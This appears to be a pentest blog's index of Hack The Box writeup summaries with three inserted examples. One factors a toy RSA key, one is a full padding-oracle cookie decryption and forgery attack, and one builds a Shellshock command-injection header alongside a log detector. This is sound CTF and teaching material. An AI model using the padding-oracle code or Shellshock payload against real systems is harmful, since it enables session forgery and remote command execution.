securitea.tech
Penetration testing writeups, security bulletins, and lessons from the trenches of offensive security.
HTB: Jail
A stack buffer overflow with socket-reuse shellcode, NFS SUID escalation via raw syscall assembly, an rvim Python escape, and PwnKit combine for a four-stage privilege escalation on CentOS 7.
HTB: Brainfuck
A six-step attack chain across WordPress, SMTP, POP3, a Flarum forum whose messages are protected with a Vigenère cipher, SSH key cracking, and RSA cryptanalysis delivers the root flag without ever gaining a root shell.
HTB: WingData
A NULL byte in Wing FTP Server's login handler triggers Lua code injection for unauthenticated RCE, then a Python tarfile data filter bypass via PATH_MAX overflow writes an SSH key to root.
HTB: Pterodactyl
A critical LFI in Pterodactyl Panel's locale endpoint chains with pearcmd.php for unauthenticated RCE, then a PAM environment injection and udisks2 XFS resize race condition deliver root on openSUSE.
HTB: Kobold
An MCPJam Inspector RCE for initial access, PrivateBin template cookie LFI for container-level code execution, database password reuse across services, and a Docker management API that mounts the host root filesystem.
HTB: Interpreter
Pre-authentication Java deserialisation in Mirth Connect, PBKDF2 hash cracking of a dictionary password, and a Python f-string template injection in a root-owned Flask service for privilege escalation.
HTB: CCTV
Default credentials on ZoneMinder, a time-based blind SQL injection to extract bcrypt hashes, SSH password reuse, and a motionEye command injection running as root through a surveillance daemon's notification configuration.
HTB: Holiday
A Linux box combining SQL injection for credential extraction, stored XSS with aggressive filter bypass to steal an admin cookie, command injection through a character-restricted export endpoint, and sudo npm install for root.
HTB: Charon
A multi-stage Linux box requiring two SQL injection points, a case-sensitive keyword filter bypass, a hidden base64 upload field, RSA key factorisation, and a SUID binary with a newline injection to reach root.
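Both Brainfuck and Charon end with the same arithmetic: an RSA modulus small enough to factor, from which the private exponent falls out and the CTF ciphertext decrypts. The block below is an added example, not code from either writeup. It uses a constructed toy key (two close 30-bit primes; real keys are 2048 bits and beyond reach of this method) and Fermat's factoring method, which is the usual first try when p and q sit close together. Every constant in it is made up for the demonstration.

```python
from math import isqrt

# Constructed toy parameters: two close 30-bit primes. Nothing here comes
# from an actual box; the numbers only need to be small enough to factor.
P_TOY = 1000000007
Q_TOY = 1000000009
E = 65537
N_TOY = P_TOY * Q_TOY


def fermat_factor(n, max_iter=1_000_000):
    """Fermat's method: write n = a^2 - b^2 = (a - b)(a + b).
    It converges in a handful of steps when p and q are close, which is the
    weakness CTF keys usually have. It is hopeless for well-generated keys."""
    a = isqrt(n)
    if a * a < n:
        a += 1
    for _ in range(max_iter):
        b2 = a * a - n
        b = isqrt(b2)
        if b * b == b2:
            p, q = a - b, a + b
            if p > 1 and p * q == n:
                return (p, q) if p < q else (q, p)
        a += 1
    raise ValueError("p and q not close enough for Fermat; try another method")


def private_exponent(p, q, e):
    """d = e^-1 mod phi(n). Once p and q are known this is the whole key recovery,
    which is also the Brainfuck case where p and q are simply handed over."""
    phi = (p - 1) * (q - 1)
    return pow(e, -1, phi)


def rsa_decrypt(c, n, d):
    m = pow(c, d, n)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


def toy_ciphertext(plaintext=b"pwn3d!"):
    """Constructed stand-in for the ciphertext found on the box (textbook RSA, no padding)."""
    m = int.from_bytes(plaintext, "big")
    assert m < N_TOY, "message must be smaller than the modulus"
    return pow(m, E, N_TOY)


def recover_plaintext(c, n=N_TOY, e=E):
    """Full chain: factor n, derive d, decrypt c."""
    p, q = fermat_factor(n)
    d = private_exponent(p, q, e)
    return rsa_decrypt(c, n, d)


if __name__ == "__main__":
    c = toy_ciphertext()
    print("factors:", fermat_factor(N_TOY))
    print("plaintext:", recover_plaintext(c))
```

If Fermat's method does not terminate quickly the primes are not close, and the next stops are checking n against public factor databases or looking for a shared factor with another key from the same box.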
HTB: Calamity
A 32-bit Linux box with hardcoded credentials, a PHP code injection endpoint, audio steganography for SSH credentials, and an LXD group membership that provides a container escape to root.
HTB: Garfield
An Active Directory domain with a Read-Only Domain Controller whose Password Replication Policy is writable by a Tier 1 admin, enabling the KERB-KEY-LIST attack to extract the Administrator's NT hash.
HTB: Facts
A path traversal in Camaleon CMS exposes Rails master keys, SQLite databases, and authentication tokens, enabling admin takeover through cookie forgery on a Ruby on Rails 8 application.
HTB: PiHole
Default Raspberry Pi credentials bypass the Pi-hole web surface entirely, passwordless sudo delivers root, and a deleted flag requires raw block device recovery with strings.
HTB: DevArea
Apache CXF MTOM SSRF reads credentials from systemd unit files, Hoverfly middleware provides RCE, and a world-writable /usr/bin/bash combined with a sudoers negation bypass delivers root.
HTB: Inception
A layered exploitation chain through dompdf LFI, WebDAV file upload, LXC container escape via anonymous FTP reconnaissance, and apt pre-invoke hook injection through TFTP.
HTB: Nineveh
A multi-stage chain through phpLiteAdmin, LFI with path filtering, steganographic SSH key extraction, and a chkrootkit privilege escalation on an Ubuntu 16.04 host.
HTB: Apocalyst
A steganographic wordlist hidden in a WordPress uploads image provides the admin password through brute-force, then a world-readable .secret file and LXD group membership deliver root via container escape.
HTB: Lazy
A padding oracle in a custom PHP authentication cookie lets an attacker decrypt the CBC-encrypted cookie and forge an admin one without the key, exposing an SSH key. A SUID binary with a relative PATH call to cat completes the root chain.
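The Lazy cookie attack in working form, as an added example that is not code from the writeup or from the box's PHP. The server side is constructed: a CBC mode over a toy Feistel block cipher (standing in for AES, which the attack never needs to know about) with PKCS#7 padding, and an oracle that distinguishes bad padding from good, which is exactly the leak a padbuster-style tool exploits. The attacker side recovers the plaintext byte by byte and then forges a cookie for a chosen plaintext by working backwards from an arbitrary final block.

```python
import hashlib
import os

BLOCK = 16
KEY = b"constructed-demo-key-not-secret!"  # constructed server secret; the attacker never learns it


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key, half, i):
    return hashlib.sha256(key + bytes([i]) + half).digest()[:8]


def block_encrypt(key, blk):
    """Toy 16-byte, 4-round Feistel cipher standing in for AES; any block cipher would do."""
    l, r = blk[:8], blk[8:]
    for i in range(4):
        l, r = r, _xor(l, _round(key, r, i))
    return r + l


def block_decrypt(key, blk):
    r, l = blk[:8], blk[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _round(key, l, i)), l
    return l + r


def pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")  # this distinguishable failure is the oracle
    return data[:-n]


def cbc_decrypt(key, iv, ct):
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return unpad(out)


# --- vulnerable server (constructed) ---------------------------------------
def issue_cookie(username):
    """Cookie layout: IV || CBC ciphertext of 'user=<name>'."""
    iv = prev = os.urandom(BLOCK)
    pt, out = pad(b"user=" + username), b""
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(KEY, _xor(pt[i:i + BLOCK], prev))
        out += prev
    return iv + out


def padding_oracle(cookie):
    """What the app leaks: whether the padding of a submitted cookie was valid."""
    try:
        cbc_decrypt(KEY, cookie[:BLOCK], cookie[BLOCK:])
        return True
    except ValueError:
        return False


def is_admin(cookie):
    try:
        return cbc_decrypt(KEY, cookie[:BLOCK], cookie[BLOCK:]) == b"user=admin"
    except ValueError:
        return False


# --- attacker: decryption and forgery with no key ---------------------------
def recover_intermediate(oracle, target):
    """Recover D_key(target) byte by byte by finding the prefix byte that makes each padding length valid."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        padval = BLOCK - pos
        prefix = bytearray(inter[j] ^ padval if j > pos else 0 for j in range(BLOCK))
        for guess in range(256):
            prefix[pos] = guess
            if not oracle(bytes(prefix) + target):
                continue
            if pos == BLOCK - 1:  # rule out an accidental 0x02 0x02 (or longer) match
                prefix[pos - 1] ^= 1
                ok = oracle(bytes(prefix) + target)
                prefix[pos - 1] ^= 1
                if not ok:
                    continue
            inter[pos] = guess ^ padval
            break
        else:
            raise RuntimeError("oracle accepted no byte; is this really a padding oracle?")
    return bytes(inter)


def attack_decrypt(oracle, cookie):
    blocks = [cookie[i:i + BLOCK] for i in range(0, len(cookie), BLOCK)]
    return unpad(b"".join(_xor(recover_intermediate(oracle, c), p) for p, c in zip(blocks, blocks[1:])))


def attack_forge(oracle, plaintext):
    """Encrypt a chosen plaintext without the key: fix the last block, then work backwards to the IV."""
    pt, out = pad(plaintext), [bytes(BLOCK)]
    for i in range(len(pt) - BLOCK, -1, -BLOCK):
        out.insert(0, _xor(recover_intermediate(oracle, out[0]), pt[i:i + BLOCK]))
    return b"".join(out)  # first block is the IV, exactly what the server expects
```

The forgery needs no knowledge of the cipher at all; the oracle answers roughly 128 queries per byte, so a 16-byte block costs a few thousand requests. The fix on the application side is to authenticate the cookie (an HMAC checked before decryption) so that a tampered ciphertext is rejected without ever reaching the padding check.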
HTB: October
Default credentials on October CMS grant admin access, the code editor provides RCE as www-data, and a 32-bit SUID buffer overflow with ASLR brute-force delivers root in under ten seconds.
HTB: TenTen
A WordPress Job Manager plugin leaks uploaded file names through predictable post IDs, revealing a steganographic image that hides an encrypted SSH key. A misconfigured sudo rule on /bin/fuckin completes the chain to root.
HTB: Bastard
Drupalgeddon 2 delivers unauthenticated RCE on a Windows Server 2008 R2 box with zero hotfixes, then JuicyPotato turns an IIS service account into SYSTEM via COM/DCOM token impersonation.
HTB: Europa
An SQL injection bypass on a TLS-disclosed admin portal leads to PHP code execution via preg_replace's /e modifier, then a writable cron script grants root.
HTB: Cronos
DNS zone transfer discloses a hidden admin subdomain, SQL injection bypasses authentication, command injection provides a shell, and a writable cron script escalates to root.
HTB: Beep
An Elastix PBX system with 15 open ports, a universal password across every service, and a local file inclusion that discloses credentials from the configuration file.
HTB: Bank
A DNS zone transfer leaks the domain, a failed encryption process exposes plaintext credentials, a debug file extension bypass enables a webshell, and a custom SUID binary gives instant root.
HTB: Blocky
A custom Minecraft plugin with hardcoded database credentials leads to SSH access via credential reuse, and sudo group membership completes the chain to root.
HTB: Optimum
A null byte injection in Rejetto HFS 2.3 gives unauthenticated RCE, and a Secondary Logon race condition escalates to SYSTEM on an unpatched Windows Server 2012 R2.
HTB: Grandpa
A buffer overflow in IIS 6.0's WebDAV handler delivers code execution on Windows Server 2003, and token kidnapping completes the escalation to SYSTEM.
HTB: Granny
IIS 6.0 with WebDAV enabled permits unauthenticated file upload via PUT and MOVE, bypassing extension restrictions to deploy an ASPX webshell. Token kidnapping (MS09-012) escalates NETWORK SERVICE to SYSTEM on Windows Server 2003.
HTB: Arctic
Adobe ColdFusion 8 on Windows Server 2008 R2 yields unauthenticated RCE through a three-part chain: directory traversal for credential extraction, FCKeditor file upload, and LFI-based CFML code injection. MS10-059 escalates to SYSTEM when JuicyPotato fails.
HTB: Sense
Default credentials and a plaintext credential disclosure file on a pfSense 2.1.3 appliance lead to authenticated command injection (CVE-2016-10709) running as root. The box demonstrates why network appliances are high-value targets: their web management interfaces run as root by design.
HTB: Shocker
A CGI bash script on Apache 2.4.18 is vulnerable to Shellshock (CVE-2014-6271), yielding RCE via a crafted User-Agent header. A sudo NOPASSWD entry for Perl completes the path to root. The real challenge is handling stdout pollution in CGI context.
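Both sides of the Shocker chain in one added example (not code from the writeup): building the User-Agent payload, including the leading `echo` that solves the CGI output problem, and spotting the same payload in Apache access logs afterwards. The log lines are constructed for the example; the 500 on the first probe illustrates what happens when the command output arrives before the blank line that ends the CGI header block.

```python
import re

# Apache combined log format; the User-Agent is the last quoted field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Shellshock's function-definition prologue "() {" with any whitespace in between.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Constructed sample lines (not from the box): two probes against the CGI
# script, one ordinary browser hit, one plain curl hit.
SAMPLE_LOG = """\
10.10.14.2 - - [10/Oct/2023:12:00:01 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 500 616 "-" "() { :; }; /bin/bash -c 'id'"
10.10.14.2 - - [10/Oct/2023:12:00:02 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :; }; echo; /bin/bash -c 'id'"
10.10.14.3 - - [10/Oct/2023:12:00:03 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0 (X11; Linux x86_64) rv:109.0"
10.10.14.4 - - [10/Oct/2023:12:00:04 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "curl/7.88.1"
"""


def shellshock_header(command):
    """Attacker side. The `echo` emits the blank line that terminates the CGI
    header block, so the command's output is served as the body rather than
    being rejected as a malformed header (the 500 on the first sample line)."""
    return "() { :; }; echo; /bin/bash -c '%s'" % command


def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect_shellshock(log_text):
    """Defender side: flag requests whose User-Agent or Referer carries the prologue."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and (SHELLSHOCK_RE.search(rec["ua"]) or SHELLSHOCK_RE.search(rec["referer"])):
            hits.append({"ip": rec["ip"], "path": rec["path"],
                         "status": int(rec["status"]), "ua": rec["ua"]})
    return hits


if __name__ == "__main__":
    print("User-Agent:", shellshock_header("id"))
    for hit in detect_shellshock(SAMPLE_LOG):
        print(hit)
```

Only the User-Agent and Referer fields are logged by default, so a probe carried in another header (Cookie, Host, a custom header) reaches the CGI environment just the same but leaves no trace in access.log; detection that matters has to look at the full request, for example at a reverse proxy or with mod_security, not at this log alone.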
HTB: Bashed
A developer leaves a PHP web shell in a publicly accessible directory, then compounds the mistake with a sudo misconfiguration and a root cron job reading from a user-writable directory. Three independent failures chain into full system compromise.
HTB: Blue
EternalBlue (MS17-010) turns an SMB-only Windows 7 host into a SYSTEM shell in under a minute. The box is a single-exploit machine, but the methodology around blind command execution and exfiltration via writable shares is worth studying.
HTB: Devel
Anonymous FTP write access to an IIS web root creates a trivial foothold. The real lesson is in the privilege escalation — unpatched Windows 7 with no service packs is a kernel exploit playground.
HTB: Legacy
MS08-067 on Windows XP — the vulnerability that powered the Conficker pandemic. A deep dive into the NetAPI32.dll buffer overflow that defined an era of network worms.
HTB: Lame
A command injection flaw in Samba's username map script configuration gives unauthenticated root on a Linux host — and a lesson in why the obvious exploit isn't always the right one.